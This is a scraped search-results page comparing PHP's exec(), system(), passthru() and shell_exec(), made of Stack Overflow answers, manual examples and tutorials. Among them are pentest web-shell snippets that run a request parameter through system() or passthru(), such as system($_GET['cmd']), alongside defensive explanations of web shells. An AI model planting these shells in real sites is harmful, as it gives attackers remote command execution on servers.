They have slightly different purposes.

  • exec() is for calling a system command, and perhaps dealing with the output yourself.
  • system() is for executing a system command and immediately displaying the output - presumably text.
  • passthru() is for executing a system command which you wish the raw return from - presumably something binary.

Regardless, I suggest you not use any of them. They all produce highly unportable code.

Answer from Kalium on Stack Overflow
🌐
PHP
php.net › manual › en › function.system.php
PHP: system - Manual
<?php echo '<pre>'; // Outputs all the result of shellcommand "ls", and returns // the last output line into $last_line. Stores the return value // of the shell command in $retval. $last_line = system('ls', $retval); // Printing additional info echo ' </pre> <hr />Last line of the output: ' .
🌐
Stack Overflow
stackoverflow.com › questions › 732832 › php-exec-vs-system-vs-passthru
command - PHP exec() vs system() vs passthru() - Stack Overflow
Top answer
1 of 5
220

They have slightly different purposes.

  • exec() is for calling a system command, and perhaps dealing with the output yourself.
  • system() is for executing a system command and immediately displaying the output - presumably text.
  • passthru() is for executing a system command which you wish the raw return from - presumably something binary.

Regardless, I suggest you not use any of them. They all produce highly unportable code.

2 of 5
173

The previous answers seem all to be a little confusing or incomplete, so here is a table of the differences...

+----------------+-----------------+----------------+----------------+
|    Command     | Displays Output | Can Get Output | Gets Exit Code |
+----------------+-----------------+----------------+----------------+
| system()       | Yes (as text)   | Last line only | Yes            |
| passthru()     | Yes (raw)       | No             | Yes            |
| exec()         | No              | Yes (array)    | Yes            |
| shell_exec()   | No              | Yes (string)   | No             |
| backticks (``) | No              | Yes (string)   | No             |
+----------------+-----------------+----------------+----------------+
  • "Displays Output" means it streams the output to the browser (or command line output if running from a command line).
  • "Can Get Output" means you can get the output of the command and assign it to a PHP variable.
  • The "exit code" is a special value returned by the command (also called the "return status"). Zero usually means it was successful, other values are usually error codes.

Other misc things to be aware of:

  • The shell_exec() and the backticks operator do the same thing.
  • There are also proc_open() and popen() which allow you to interactively read/write streams with an executing command.
  • Add "2>&1" to the command string if you also want to capture/display error messages.
  • Use escapeshellcmd() to escape command arguments that may contain problem characters.
  • If passing an $output variable to exec() to store the output, if $output isn't empty, it will append the new output to it. So you may need to unset($output) first.
🌐
GitHub
github.com › ahmetgurel › Pentest-Hints › blob › master › Simple PHP Shell
Pentest-Hints/Simple PHP Shell at master · ahmetgurel/Pentest-Hints
Usage:http://www.example.com/shell.php?cmd=ls · · · <?php · if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>$cmd<pre>"; die; } ?> · · · or ·
Author   ahmetgurel
People also ask
How do malicious hackers use web shells?
Malicious hackers use web shells to take control of an already compromised server. First, they exploit a vulnerability in your website or web application such as SQL injection, remote code execution, or others. Then, they upload a web shell to your web server. From now on, they can run any commands that they like on your server. See a step-by-step example of an attack that leads to full server compromise.
🌐
acunetix.com
acunetix.com › blog › articles › web-shells-101-using-php-introduction-web-shells-part-2
Web Shells 101 Using PHP (Web Shells Part 2) | Acunetix
What is a web shell?
A web shell is a small application that an attacker runs on your web server. They can then use this application to remotely access your server and run commands on it. A web shell by itself is never an attack, it is the aftermath of a successful attack on your website or web application. This means that if you have a web shell, you have a much more serious problem to worry about. See how a web shell works in practice.
🌐
acunetix.com
acunetix.com › blog › articles › web-shells-101-using-php-introduction-web-shells-part-2
Web Shells 101 Using PHP (Web Shells Part 2) | Acunetix
How can I detect web shells?
You can detect web shells by log analysis. However, you should not focus on detecting web shells but instead, you should detect vulnerabilities that can let attackers take control of your server. Even if you detect a web shell, that will not stop attackers from taking over control again if the vulnerabilities are still there. To detect web vulnerabilities and learn how to eliminate them, use Acunetix. See what Acunetix Premium can do for you.
🌐
acunetix.com
acunetix.com › blog › articles › web-shells-101-using-php-introduction-web-shells-part-2
Web Shells 101 Using PHP (Web Shells Part 2) | Acunetix
🌐
Acunetix
acunetix.com › blog › articles › web-shells-101-using-php-introduction-web-shells-part-2
Web Shells 101 Using PHP (Web Shells Part 2) | Acunetix
March 5, 2025 - <?php // Return the listing of the directory where the file runs (Linux) system("ls -la"); ?> --> total 12 drwxrwxr-x 2 secuser secuser 4096 Feb 27 20:43 . drwxr-xr-x 6 secuser secuser 4096 Feb 27 20:40 ..
🌐
BCCNsoft
doc.bccnsoft.com › docs › php-docs-7-en › function.system.html
Execute an external program and display the output
Example #1 system() example · <?php echo '<pre>'; // Outputs all the result of shellcommand "ls", and returns // the last output line into $last_line. Stores the return value // of the shell command in $retval. $last_line = system('ls', $retval); // Printing additional info echo ' </pre> <hr />Last line of the output: ' .
🌐
Codrops
tympanus.net › codrops › 2009 › 09 › 01 › how-to-list-files-in-a-directory-with-php
How to list files in a directory with PHP | Codrops
<?php $row = exec('ls -ls',$output,$error); while(list(,$row) = each($output)){ echo $row, "<BR>n"; } if($error){ echo "Error : $error<BR>n"; exit; } ?>
🌐
Stack Overflow
stackoverflow.com › questions › 31311717 › ls-command-without-using-system-calls-in-php
LS command without using system calls in PHP - Stack Overflow
Top answer
1 of 3
1

Try with the glob function. See documentation for many examples.

2 of 3
1

See the readdir examples. It shows how to list directories and files, then you have to get their permissions, owner or other attributes like modification time. Follow the list of filesystem functions and you'll find everything you need

🌐
GitBooks
sushant747.gitbooks.io › total-oscp-guide › content › webshell.html
Webshell · Total OSCP Guide - sushant747
# Execute one command <?php system("whoami"); ?> # Take input from the url paramter. shell.php?cmd=whoami <?php system($_GET['cmd']); ?> # The same but using passthru <?php passthru($_GET['cmd']); ?> # For shell_exec to output the result you need to echo it <?php echo shell_exec("whoami");?> # Exec() does not output the result without echo, and only output the last line. So not very useful! <?php echo exec("whoami");?> # Instead to this if you can. It will return the output as an array, and then print it all. <?php exec("ls -la",$array); print_r($array); ?> # preg_replace().
Find elsewhere
🌐
Piotr Horzycki
peterdev.pl › execute-a-shell-command-in-php
Executing shell commands from a PHP script | Piotr Horzycki - Java and PHP developer’s blog
April 2, 2021 - The PHP documentation recommends it in case if binary output has to be sent without interference. shell_exec() executes a command and returns the complete output as a string. It does not provide the exit code. The function return value is confusing because it can be null both if an error occured or if the command produced no output. system() acts like passthru(), but it also returns the last line of the output.
🌐
GeeksforGeeks
geeksforgeeks.org › php › php-shell_exec-vs-exec-function
PHP shell_exec() vs exec() Function - GeeksforGeeks
July 11, 2025 - <?php // Use ls command with shell_exec function $output = shell_exec('ls'); // Display the list of all files and directories echo "<pre>$output</pre>"; ?>
🌐
W3Docs
w3docs.com › php
PHP exec() vs system() vs passthru()
<?php $output = exec('ls -l'); echo $output; system('ls -l'); passthru('ls -l'); Copy · Tags · exec command php · How do I execute a program or call a system command? Reference — What does this symbol mean in PHP? How can I prevent SQL injection in PHP? Why shouldn't I use mysql_* functions in PHP?
🌐
UnPHP
unphp.net › decode › f95bc7481ed6c76383e49f1254b15d15
UnPHP - PHP Decode of eval('system("ls -la")');..
<? eval('system("ls -la")'); ?> Yes · No · Malicious · Suspicious · Benign · Thank you for your feedback! This will help us detect malicious PHP files more accurately in the future.
🌐
Linux Hint
linuxhint.com › execute_shell_command_php
Execute Shell Command in PHP using exec() – Linux Hint
Here, the ‘ls -l *.php‘ command is used here to find out the list of all PHP files of the current directory.
🌐
DaniWeb
daniweb.com › programming › web-development › threads › 118019 › system-ls-okay-system-cp-not-why
php - system("ls") okay, system("cp") not. Why? | DaniWeb
April 8, 2008 - <?php system("ls /home/hans/"); ?> and this not..... <?php system("cp /home/hans/data.txt /home/hans/data.tx2"); ?> For the life of me, I can't figure it out. I simply want to copy a file, so why won't php let me do this? Please help, because I'm getting a little frustrated.
🌐
University of Geneva
tecfa.unige.ch › guides › php › php5_fr › function.system.html
system
Note : Si vous démarrez un programme ... sortie du programme est redirigée vers un fichier, ou un autre flux de sortie, sinon PHP attendra jusqu'à la fin de l'exécution du programme. system() retourne la dernière ligne du retour, en cas de succès, et FALSE en cas d'é...
🌐
Stack Overflow
stackoverflow.com › questions › 12830520 › how-can-i-run-a-linux-command-from-a-php-script
How can I run a linux command from a PHP script - Stack Overflow
Top answer
1 of 4
21

Use exec to run any command. Be careful not to exec any user input though, as it can severely compromise your server.

Also, note that most shared servers block off the exec function so you won't be able to use it.

Finally, as a shorthand, you can wrap the command you want to exec in backticks.

2 of 4
6

You can do what you want with the following code :

system(command);

See http://php.net/system

🌐
Tutorialspoint
tutorialspoint.com › php › php_system_calls.htm
PHP System Calls
passthru(string $command, int &$result_code = null): ?false <?php passthru ('PATH'); ?> ... PATH=C:\Python311\Scripts\;C:\Python311\;C:\WINDOWS\system32;C:\WINDOWS; C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\; C:\WINDOWS\System32\OpenSSH\;C:\xampp\php;C:\Users\mlath\AppData\Local \Microsoft\WindowsApps;C:\VSCode\Microsoft VS Code\bin
Related queries
?php system($_get['cmd']);?
php exec() command
php system($_request 'cmd' )
php system reverse shell
php system command injection
exec in php - w3schools
php commands list
php system exploit